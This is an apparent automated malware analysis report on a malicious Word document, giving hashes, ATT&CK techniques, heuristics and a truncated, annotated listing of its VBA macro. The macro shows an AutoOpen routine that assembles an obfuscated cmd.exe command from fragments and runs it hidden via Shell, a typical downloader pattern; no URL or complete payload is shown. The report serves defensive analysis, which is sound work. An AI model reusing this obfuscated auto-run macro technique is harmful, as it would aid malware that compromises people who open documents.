Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8bb55c05b6270077…

MALICIOUS

Office (OLE)

91.6 KB Created: 2018-08-13 07:10:00 Authoring application: Microsoft Office Word First seen: 2019-04-17
MD5: c952a316d9cad0959d00fe6ccef82159 SHA-1: 239d9ff55800c1026de0d4663bfaada4dbbf48a1 SHA-256: 8bb55c05b6270077ba1a0a5087aac41525a1700900fdf774946bd88d8df4a9d0
82 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro assembles an obfuscated command line from concatenated string fragments (in the recovered source it begins with `cmd /V:O /C "set ...` followed by a `for %S in ( ...` loop over a list of integers) and passes it to `Shell` with window style `0` (vbHide), so the command runs with no visible window. The recovered source is truncated, so the complete command and any download URL were not reconstructed here; the heavy obfuscation, the hidden cmd.exe invocation and the AutoOpen marker are nonetheless consistent with downloader or dropper functionality that attempts to fetch and run a second-stage payload.

Heuristics 4

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. On its own this heuristic fires when no modern VBA project was recovered and no stronger macro-virus family marker was present; it is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that for this sample a VBA project was in fact recovered (see "Extracted artifacts" below), so this finding is redundant with OLE_VBA_AUTOOPEN above and should not be counted as independent evidence.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace URI present in ordinary Office documents, not a host the macro contacts; it should not be treated as a network indicator.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13869 bytes
SHA-256: 47866b0626a262d6c73143cb2d2b7773d78b8e2b90452f0ded3da6d53e62d5ea
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "GSzXhXWSv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-execution entry point: Word runs AutoOpen when the document is opened.
' Everything in this procedure except the Shell call is filler whose result is
' discarded; the filler exists to pad and obscure the single real action.
Sub AutoOpen()
' Suppress every runtime error (references to names that are never assigned,
' the division-by-Empty below, ...) so that the Shell call is always reached.
On Error Resume Next
   ' Junk statements: TypeName is invoked as a statement and its return value
   ' is thrown away, so these lines have no effect on the command.
   TypeName Fix(331004079)
   TypeName Int(70)
   TypeName Round(6)
   TypeName ChrB(1055)
' The command line is the concatenation of helper-function return values.
' TjXrAWAJVc, NLBuhIVdQ and UdzjOcapsu are visible in this listing; the rest
' are outside the visible portion, so the complete command cannot be
' reconstructed from here alone. KeyString(vbKeyC) (vbKeyC = 67) is presumably
' Word's Application.KeyString, yielding "c", which joins the "md  /V:O ..."
' fragment returned by TjXrAWAJVc into "cmd ...". The second argument
' evaluates to 307535380 - 307535380 = 0 = vbHide, so the spawned process has
' no visible window. The "!" suffix on Shell appears to be VBA's Single
' type-declaration character (like "$" in Left$) and does not change the call.
Shell! KeyString(vbKeyC) + jctHvdBj + WRTihvcPhdGj + TjXrAWAJVc + NLBuhIVdQ + UdzjOcapsu + kQacFUN + NNDUjCw + pdXXjoVSwid + HljzBAZrYz + aYipwmcD + vjiwHQ + HTZiwZjzajY + iBFUKSdHHrV + cjsJHwlovqSmA + iCwwHqVQ, 307535380 - 307535380
   TypeName Fix(428)
   ' CAAip and lYzFX are not assigned anywhere in the visible listing; if they
   ' are undeclared Variants the division raises an error that the
   ' On Error Resume Next above swallows. Executed after Shell, so harmless.
   TypeName Chr(25388 / CAAip - 85056 - lYzFX)
End Sub


Attribute VB_Name = "plEKdhWwEvFR"
' Returns the opening fragment of the cmd.exe command line assembled in
' AutoOpen. The text is split into many short literals plus Chr() calls on
' arithmetic expressions so that no signature-worthy string appears verbatim.
' The interleaved "TypeName ..." statements are no-ops (return value discarded).
' NOTE(review): the extra addends inside each Chr() (jTRUitottPZD, QtYZoNtMbl,
' ...) are not assigned in the visible listing; the decodings below assume they
' are undeclared Variants contributing 0. Confirm against the full module.
Function TjXrAWAJVc()
On Error Resume Next
TypeName ChrW(12)
   TypeName CByte(micwpz * LvfToD)
' Chr(67) = "C", Chr(34) = '"'  ->  'md  /V:O   /C  "set '
' Together with the leading "c" from AutoOpen this is cmd /V:O (presumably
' parsed as /V:ON, delayed environment-variable expansion) /C "set ...
iKppF = "m" + "d  " + "/V" + ":O " + "  /" + CStr(Chr(jTRUitottPZD + QtYZoNtMbl + 67 + iBumVfOIQILsQ + QTmImVhEcsd)) + " " + " " + CStr(Chr(nTsfZnLmzHtu + HHifJLndtpc + 34 + AzStsccUwQ + cSoRMsOwq)) + "s" + "et "
TypeName Rnd(lflbOD * duSQrF)
   TypeName Oct(3090)
' Chr(67) = "C"  ->  '    Nqj=oCIHJ'  : start of an environment variable
' assignment (Nqj=...) whose value continues in the next three fragments.
LRlNDGkqPsV = "   " + " N" + "qj=" + "o" + CStr(Chr(tNUrwKaDCRTKpj + RMKLrCM + 67 + zMhwOKdZAYjXl + VMcCIHwk)) + "IHJ"
TypeName CSng(RdZYF)
   TypeName 7387
   TypeName Cos(zmKXnf + dVwqJS)
' -> 'SzsfwaHGsbKGsjPP'  (continuation of the Nqj value)
pLZEtFT = "S" + "zs" + "fwa" + "HG" + "s" + "b" + "K" + "Gs" + "j" + "PP"
TypeName Sin(152)
   TypeName Hex(48375 - MDZuD)
' -> '3hd\y/F,u(+m1.n'  (continuation of the Nqj value)
faaoWvaqI = "3" + "hd" + "\" + "y/F" + ",u" + "(+m" + "1.n"
TypeName rmSkEa
   TypeName Cos(vVzac)
   TypeName CByte(ZbGMJ / vIFSM)
' Chr(76) = "L"  ->  ';)D6{Wt @=e-}kNL:i'  (continuation of the Nqj value)
FmTtZ = ";" + ")D6" + "{W" + "t @" + "=e" + "-" + "}kN" + CStr(Chr(wljPFrAnwzztG + ploIhiji + 76 + iaKYlAciFSYzK + fkniMcGovTWK)) + ":i"
' Return value: iKppF & LRlNDGkqPsV & pLZEtFT & faaoWvaqI & FmTtZ in that order.
TjXrAWAJVc = iKppF + LRlNDGkqPsV + pLZEtFT + faaoWvaqI + FmTtZ
   TypeName CInt(FUTcw)
   TypeName Sqr(65734 - WnWLZ)
End Function
' Returns the next fragment of the cmd.exe command line (appended directly
' after TjXrAWAJVc's output in AutoOpen). It finishes the Nqj= value and opens
' a "for %S in ( ..." loop over a whitespace-separated list of integers.
' The integer list presumably indexes characters of the Nqj string inside the
' loop's (not visible here) "do" clause to rebuild the real command; that part
' of the line is outside this listing, so treat the interpretation as tentative.
' "TypeName ..." statements are no-ops whose results are discarded.
' NOTE(review): the extra addends inside each Chr() are not assigned in the
' visible listing; decodings below assume they contribute 0.
Function NLBuhIVdQ()
On Error Resume Next
TypeName Chr(LIOmJV)
   TypeName zBHDz
' Chr(99) = "c", Chr(108) = "l"  ->  "prvc$x?l'&"  (end of Nqj value, then "&")
vnGhcjvTU = "p" + "rv" + CStr(Chr(MQCfZaQqP + VKBVhratbCttDo + 99 + lOEPqAStCV + UQoVafqRESNb)) + "$x?" + CStr(Chr(zOSXzrMCi + zIVsHTMZ + 108 + LNYSYwvTTB + aAEafWbYSl)) + "'&"
TypeName CLng(BlVHY * uhQYH * 48154 / GkqZb)
   TypeName kanzZz
Function UdzjOcapsu()
On Error Resume Next
TypeName Cos(1)
   TypeName 29
   TypeName Round(TDwvqj)
HjulBcK = "10" + "  " + " " + "20 " + " 23" + "  4" + "5 3"
TypeName 393
   TypeName CDbl(3)
OKjVAJ = "5" + " " + "46" + "  " + "9  " + "  " + "47" + "  " + "  0"
TypeName Sgn(46)
   TypeName Hex(65214156)
iwVIG = " 14" + " 18" + " " + "  " + "46" + "   " + " 57" + " 42" + "  "
TypeName Sqr(4887 - AZtDu - 82192 - ZzwUiu)
   TypeName Atn(217997026)
CBciRiWQzV = " " + "43" + "  " + " " + " " + "50 " + "  " + "4" + "6 " + " 42" + "   " + " 3" + "4 "
TypeName idwlRK
   TypeName Atn(pGpQG)
   TypeName Rnd(kHhri)
hwXkVD = "  " + "4" + "1 " + "46" + " 14" + " " + " " + "1"
TypeName 74096996
   TypeName CDbl(vJNtS)
   TypeName ChrW(8)
jTOMrRlYnm = "  " + "6" + "1" + "   " + " 53" + "   " + "46" + "  " + "35" + " 42" + "  " + "  " + "36"
TypeName SNrkIo
   TypeName REwFa
   TypeName CStr(UZWqL)
WdhwbJ = "   " + "5" + "8" + " " + " "
TypeName CStr(62)
   TypeName DcvYUO
FhmABwXlvF = "  5" + "5" + "   " + " " + "61"
TypeName 352368397
   TypeName 1659
   TypeName riEMm
JQFrFiY = "   " + " 3" + "2 " + "  " + "45 " + " " + " 62" + " " + "22 " + "42 "
TypeName Round(62217 - UzvOBF)
   TypeName Hex(81586 * OPRwD)
   TypeName CDbl(DwiGj / fbGWVa)
WaZtDYbmznw = " " + " 4" + "2 " + "5" + "4" + " "
... (truncated)